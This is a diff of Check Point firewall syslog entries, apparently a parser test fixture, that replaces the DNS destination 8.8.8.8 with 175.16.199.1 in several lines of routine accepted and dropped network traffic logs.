 <134>1 2020-03-29T17:42:18Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80ddfa,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.36"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"38100"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10108"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T17:42:18Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80ddfa,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"39182"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T17:42:20Z gw-da58d3 CheckPoint 8363 - [action:"Drop"; flags:"425984"; ifdir:"outbound"; ifname:"eth0"; logid:"1"; loguid:"{0x5e80ddfe,0x0,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.99.234.45"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"42642"; service:"80"; src:"192.168.1.100"; tcp_flags:"FIN-ACK"; tcp_packet_out_of_state:"First packet isn't SYN"]
 <134>1 2020-03-29T17:42:21Z gw-da58d3 CheckPoint 8363 - [action:"Drop"; flags:"425984"; ifdir:"outbound"; ifname:"eth0"; logid:"1"; loguid:"{0x5e80ddfe,0x1,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.99.234.45"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"42640"; service:"80"; src:"192.168.1.100"; tcp_flags:"FIN-ACK"; tcp_packet_out_of_state:"First packet isn't SYN"]
-<134>1 2020-03-29T17:42:23Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80ddff,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"61743"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
+<134>1 2020-03-29T17:42:23Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80ddff,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"61743"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T17:42:34Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80de0a,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50675"; service:"443"; service_id:"https"; src:"192.168.1.117"]
 <134>1 2020-03-29T17:42:34Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80de0a,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50676"; service:"443"; service_id:"https"; src:"192.168.1.117"]
 <134>1 2020-03-29T17:43:42Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80de4e,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"162.159.200.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33081"; service:"123"; service_id:"ntp-udp"; src:"192.168.2.2"]
@@ -3249,22 +3249,22 @@
 <134>1 2020-03-29T17:48:28Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80df6c,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
 <134>1 2020-03-29T17:48:34Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80df72,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50684"; service:"443"; service_id:"https"; src:"192.168.1.117"]
 <134>1 2020-03-29T17:48:34Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80df72,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50685"; service:"443"; service_id:"https"; src:"192.168.1.117"]
-<134>1 2020-03-29T17:48:46Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80df7e,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53768"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:48:46Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80df7e,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53768"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:48:46Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80df7e,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"18.225.36.18"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"44072"; service:"80"; service_id:"http"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:48:46Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80df7e,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504126"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37294"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:48:46Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80df7e,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504126"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37294"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:48:46Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80df7e,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"178.20.174.135"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"46336"; service:"80"; service_id:"http"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:48:46Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80df7e,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504126"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54085"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:48:46Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80df7e,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504126"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54085"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:48:46Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80df7e,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"18.225.36.18"; log_delay:"1585504126"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"44076"; service:"80"; service_id:"http"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:48:47Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80df7f,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504127"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54372"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:48:47Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80df7f,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504127"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54372"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:48:47Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80df7f,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"5.255.95.70"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"47406"; service:"80"; service_id:"http"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:48:47Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80df7f,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504127"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58113"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:48:47Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80df7f,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504127"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58113"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:48:47Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80df7f,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"85.236.43.108"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"55780"; service:"80"; service_id:"http"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:48:47Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80df7f,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504127"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55562"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:48:47Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80df7f,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504127"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55562"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:48:47Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80df7f,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"80.84.224.198"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"37358"; service:"80"; service_id:"http"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:48:47Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80df7f,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504127"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49139"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
